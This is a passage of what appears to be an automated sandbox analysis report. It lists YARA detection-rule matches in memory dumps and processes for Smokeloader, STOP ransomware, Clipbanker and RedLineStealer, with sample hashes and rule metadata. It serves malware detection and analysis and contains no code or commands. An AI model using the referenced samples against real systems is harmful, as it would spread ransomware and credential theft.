                Source: 00000004.00000002.632649984.00000000039F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000001E.00000002.692342997.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000026.00000002.692364725.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 00000026.00000002.692364725.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000001E.00000002.695759811.0000000001D56000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.569951973.00000000038E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000C.00000002.686700698.00000000038E1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000021.00000002.694598336.0000000001D31000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.569855669.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000026.00000002.692220584.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 00000026.00000002.692220584.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.569716746.0000000001DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000009.00000002.648114882.0000000001D22000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 5512, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 7060, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 124D.exe PID: 7152, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 124D.exe PID: 6684, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 46F.exe PID: 2888, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: F42F.exe PID: 4572, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 3332, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 46F.exe PID: 3112, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: F42F.exe PID: 4768, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 5192, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 6E6C.exe PID: 2148, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 6E6C.exe PID: 4608, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 46F.exe PID: 5308, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 46F.exe PID: 5000, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 5024, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 5384, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 5792, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9721.exe PID: 4560, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
